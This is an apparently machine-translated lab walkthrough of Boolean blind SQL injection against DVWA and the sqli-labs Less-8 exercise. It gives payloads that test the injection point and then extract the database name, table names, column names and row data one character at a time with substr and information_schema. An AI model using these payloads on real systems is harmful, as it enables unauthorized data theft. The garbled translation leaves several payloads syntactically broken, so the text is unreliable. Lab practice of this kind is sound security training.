Boolean Blind : configured SQL judgment statement -> such as: . 1 'and length (Database ())> = #. 5 determines the length of the character database
Using 1 'and substr (database () , 1,1) =' z '# determines the first character
1 'and substr (database () , 2,1) =' z '# determines whether the second character
1 'and ord (substr (database ()), 3,1) = 119 # Analyzing third character ASCII code
查表名:1’ and substr((select table_name from information_schema.tables where table_schema=’dvwa’ limit 1,1,),2,1)=’u’#
Determine whether the Boolean blinds -> length to determine the character of the database -> burst Database name -> burst table name -> burst fields
(Use the union injection determination)
--------------------------------------------------------------------------------------------------
. 8-Less (Boolean blind)
1 determines whether there is the injection point
Performing ? =. 1 ID , echo normal execution ID. 1 =? ' , There is no echo, first determines the presence of the injection point, performing id = 1?' - + , the normal echo, the injection mode is : ''
2. determine what type of blinds
3. Analyzing the character length of the database
Performing id = 1 'and length (database ())> = 8 -? + Try determination, the finally obtained character length of database 8
4. Explosion database name
Performing ? Id = 1 'and substr ( database (), 1,1) =' s' - + for determining whether the first character
Performing ? Id = 1 'and substr ( database (), 2,1) =' e '- + for determining a second character
Similarly, whereby one by one judge, broke up a database called security
5. burst table name
Execution + -? Id = 1 'and length ((select table_name from information_schema.tables where table_schema =' security 'limit 0,1)) = 6 the length of a determination table in the case library
Performing ? = ID. 1 'and substr ((SELECT from table_name WHERE information_schema.tables TABLE_SCHEMA =' Security 'limit 0,1 + -), 1,1) =' E ' on the first row in the database table is determined What is a letter
The first line of the table shows that color in the database
Similarly judge one by one, until the burst of security all the tables under the name: emails , referers , uagents , the Users
6. burst field name (blast emails )
Or to burst length, I do not write here
Performing ? Id = 1 'and substr ( (select column_name from information_schema.columns where table_name =' emails' limit 0,1), 1,1) = 'i' - + Analyzing Table emails field of the first row in the first letter
Similarly judge one by one, until the burst of emails all fields under the name: the above mentioned id , EMAIL_ID
7. burst data (burst ID )
执行?id=1’ and substr((select id from emails limit 0,1),1,1)=1 --+
Analyzing fields (columns) ID of a first line of data in
Similarly determined by one until the burst emails data under
-------------------------------------------------------END----------------------------------------------------------------